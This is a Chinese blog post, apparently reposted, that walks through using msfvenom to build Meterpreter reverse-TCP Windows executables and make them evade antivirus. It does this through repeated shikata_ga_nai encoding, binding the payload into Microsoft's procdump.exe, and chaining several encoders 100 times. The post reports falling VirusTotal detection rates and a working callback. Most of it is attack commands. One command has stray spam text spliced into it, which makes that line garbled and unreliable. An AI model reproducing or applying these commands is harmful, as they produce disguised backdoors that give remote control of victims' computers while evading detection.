Metasploit的实例分析是怎样的


Metasploit的实例分析是怎样的,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。测试系统:windows10 (1909)杀毒软件:360安全卫士在线杀毒:VTmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe原始生成后,完全被查杀VT查杀55/69这里使用msf自带的编码器进行测试msfvenom –list encoders 查看当前所有编码器这里根据级别(Rank)选择最好的(excellent)进行尝试:x86/shikata_ga_naimsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129LPORT=7777-e x86/shikata_ga_nai -b “x00” -i 20-f exe -o t2.exe其中-b 特征码绕过 -i 编码次数依旧被查杀测试编码并绑定微软官方工具,这里使用官方procdump做实验msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129LPORT=7777-e x86/shikata免费云主机域名_ga_nai -xprocdump.exe -i20-f exe -o t3.exe360并未报毒,vt查杀率36/68通过资料了解,msfvenom某一种编码器可以做到一定程度的免杀,这是可以多重编码增大免杀率,同时x86/shikata_ga_nai为多态编码,可以尝试增大编码次数达到免杀效果msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 100LHOST=192.168.56.129LPORT=7777-f raw | msfvenom -a x86 –platform windows -e x86/countdown -i 100-f raw | msfvenom -a x86 –platform windows -e x86/shikata_ga_nai -b “&” -i 100-f raw | msfvenom -a x86 –platform windows -e cmd/powershell_base64 -i 100-x procdump.exe -k -f exe >t4.exe这里测试编码次数100,同样绑定官方工具,360查杀并未报毒VT在线查杀率34/68测试可正常上线看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注云编程开发博客行业资讯频道,感谢您对云编程开发博客的支持。

相关推荐: Sophos是怎么用AI助力安全

Sophos是怎么用AI助力安全,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。对于当今的企业来讲,网络安全成为一个不得不面对的话题。随着企业网络的普及和应用,灰黑产开始向企业网络大…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/04 22:22
下一篇 02/04 22:22